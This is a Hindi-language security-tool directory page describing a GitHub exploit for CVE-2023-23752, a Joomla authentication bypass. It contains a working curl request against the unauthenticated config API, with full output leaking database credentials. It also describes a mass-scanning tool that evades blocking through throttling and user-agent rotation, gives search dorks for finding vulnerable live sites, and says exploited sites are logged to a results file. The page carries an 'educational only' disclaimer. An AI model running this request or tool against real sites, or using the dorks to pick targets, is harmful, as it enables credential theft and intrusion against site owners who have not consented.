Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-23752 — CVE-2023-23752 के लिए शोषण (4.0.0 <= Joomla <= 4.2.7). | Kitploit
उपकरण/GitHubGitHub/pushkarup/cve-2023-23752
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubpushkarup/cve-2023-23752

CVE-2023-23752

CVE-2023-23752 के लिए शोषण (4.0.0 <= Joomla <= 4.2.7).

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-23752

CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7) के लिए शोषण।

परिचय

जैसा कि चर्चा की गई, CVE-2023-23752 एक प्रमाणीकरण बायपास है जिसके परिणामस्वरूप जानकारी लीक होती है। अधिकांश सार्वजनिक शोषण बायपास का उपयोग करके सिस्टम के कॉन्फ़िगरेशन को लीक करते हैं, जिसमें Joomla! MySQL डेटाबेस क्रेडेंशियल स्पष्ट पाठ में शामिल होते हैं। निम्नलिखित लीक को प्रदर्शित करता है:

root@kitploit:~
$ curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
*   Trying 10.9.49.205:80...
* TCP_NODELAY set
* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)
> GET /api/index.php/v1/config/application?public=true HTTP/1.1
> Host: 10.9.49.205
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 20 Mar 2023 15:14:05 GMT
< Server: Apache/2.4.41 (Ubuntu)
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Content-Length: 1983
< Content-Type: application/vnd.api+json; charset=utf-8
<
{"links":{"self":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true","next":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"This site is down for maintenance.<br>Please check back again soon.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"vulncheck","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"i* Connection #0 to host 10.9.49.205 left intact
d":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"localhost","id":224}},{"type":"application","id":"224","attributes":{"user":"root","id":224}},{"type":"application","id":"224","attributes":{"password":"labpass1","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"xj3n0_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}

उपरोक्त प्रूफ ऑफ कॉन्सेप्ट में, सर्वर root:labpass1 क्रेडेंशियल के साथ प्रतिक्रिया करता है, जो हमारे परीक्षण Joomla! MySQL खाते के क्रेडेंशियल हैं। लेकिन यह जानना महत्वपूर्ण है कि हमारा परीक्षण MySQL सर्वर 127.0.0.1 से बंधा हुआ था, इसलिए दूरस्थ हमलावर सर्वर तक नहीं पहुँच सकता, जिससे क्रेडेंशियल ज्यादातर बेकार हो जाते हैं। MySQL को localhost से बांधना सबसे सामान्य कॉन्फ़िगरेशन होना चाहिए, जो इस क्रेडेंशियल लीक को गंभीर रूप से सीमित करता है।

अस्वीकरण: केवल शैक्षिक उद्देश्य

यह शोषण और प्रूफ ऑफ कॉन्सेप्ट (PoC) पूरी तरह से शैक्षिक और सूचनात्मक उद्देश्यों के लिए प्रस्तुत किया गया है। इसे साझा करने के पीछे का इरादा नियंत्रित वातावरण में संभावित कमजोरियों को प्रदर्शित करना है। लक्ष्य साइबर सुरक्षा अवधारणाओं की समझ को बढ़ावा देना और जिम्मेदार प्रकटीकरण को प्रोत्साहित करना है।

महत्वपूर्ण बिंदु:

  • नैतिक उपयोग: इस शोषण और PoC का उपयोग केवल उन वातावरणों और प्रणालियों में किया जाना चाहिए जहाँ आपके पास स्पष्ट अनुमति हो। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध और अनैतिक है।
  • जिम्मेदार प्रकटीकरण: यदि आप इस शोषण और PoC के परिणामस्वरूप कमजोरियों की खोज करते हैं, तो दृढ़ता से अनुशंसा की जाती है कि उन्हें जिम्मेदारी से संबंधित पार्टियों को रिपोर्ट करें, जिससे उन्हें मुद्दों को संबोधित करने और कम करने के लिए पर्याप्त समय मिल सके।
  • कोई समर्थन नहीं: यह PoC और संबंधित सामग्री किसी भी प्रकार की अनधिकृत पहुँच, हैकिंग, या किसी अन्य अवैध गतिविधियों का समर्थन या प्रोत्साहन नहीं करती है।

इस शोषण और PoC तक पहुँचने और इसका उपयोग करने से, आप स्वीकार करते हैं कि आप अपने कार्यों के लिए पूरी तरह से जिम्मेदार हैं और इस जानकारी का उपयोग लागू कानूनों और विनियमों के अनुपालन में करने के लिए सहमत हैं। लेखक शिक्षा और जिम्मेदार प्रकटीकरण के अलावा किसी भी उद्देश्य के लिए इस PoC के उपयोग से उत्पन्न किसी भी दुरुपयोग या परिणामों के लिए कोई दायित्व नहीं मानता है।

शोषण विशेषताएँ

  • एकल स्कैन: शोषण के लिए एकल साइट स्कैन करना।
  • सामूहिक स्कैन: शोषण के लिए फ़ाइल से साइटों की सूची स्कैन करना।
  • अतुल्यकालिक थ्रेडिंग: तेज़ प्रसंस्करण के लिए थ्रेड का उपयोग करना।
  • गतिशील थ्रॉटलिंग: बहुत सारे अनुरोध जल्दी भेजने से बचने के लिए एक गतिशील अनुरोध थ्रॉटलिंग तकनीक लागू करें, जो अवरुद्ध होने से बचने में सहायता कर सकती है।
  • परिणाम सारांश: स्कैन के समापन पर निष्कर्षों का सारांश दें, जिसमें सफल स्कैन, असफल स्कैन और पहचानी गई किसी भी समस्या पर डेटा दिया जाए।
  • इनपुट सत्यापन: यह सुनिश्चित करने के लिए इनपुट सत्यापन लागू करें कि उपयोगकर्ता इनपुट, विशेष रूप से फ़ाइलों से, सही ढंग से संरचित हों और वैध URL हों।
  • यूज़र-एजेंट रोटेशन: प्रत्येक अनुरोध के लिए यूज़र-एजेंट हेडर को विभिन्न ब्राउज़रों की नकल करने और अवरुद्ध होने की संभावना को कम करने के लिए घुमाएँ।

आरंभ करना

पूर्वापेक्षाएँ

  • Python 3.x
  • आवश्यक Python पैकेज: requests, colorama, urllib3, fake_useragent, aio-http

स्थापना

  1. रिपॉजिटरी क्लोन करें:

    root@kitploit:~
    git clone https://github.com/Pushkarup/CVE-2023-23752.git
    cd CVE-2023-23752
    
  2. आवश्यक Python पैकेज स्थापित करें:

    root@kitploit:~
    pip install -r requirements.txt
    

उपयोग

  1. लक्ष्य साइटों वाली एक टेक्स्ट फ़ाइल बनाएं (प्रति पंक्ति एक) और इसे .txt एक्सटेंशन के साथ सहेजें।
  • डॉर्क का उपयोग करके परीक्षण के लिए साइट सूची एकत्र करें inurl:/api/index.php/v1/config/application?public=true, intitle:"Index of" /api/index.php/v1/config/application?public=true, filetype:php inurl:/api/index.php/v1/config/application?public=true, intitle:"Index of" AND intext:"config" AND intext:"application" AND intext:"public=true"
  1. स्क्रिप्ट चलाएँ:

    root@kitploit:~
    python joomla.py
    
  2. स्क्रिप्ट को अपना कोर्स चलने दें और निर्देशों का पालन करें।

  3. शोषित की गई प्रत्येक साइट Results.txt में संग्रहीत हो जाएगी।

योगदान

योगदान का स्वागत है! यदि आपको कोई समस्या मिलती है या सुधार हैं, तो बेझिझक पुल अनुरोध खोलें या कोई समस्या बनाएँ।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।

संपर्क

  • GitHub: Pushkar Upadhyay
  • LinkedIn: Pushkar Upadhyay

दान

अपना समर्थन दिखाएँ

  • BTC: 3QqVBBzDBezA9U77PCTwMPQVGb1eecv2SP
  • ETH: 0xB779767483831BD98327A449C78FfccE2cc6df0a
  • USDT: 0xB779767483831BD98327A449C78FfccE2cc6df0a
टूल डाउनलोड करें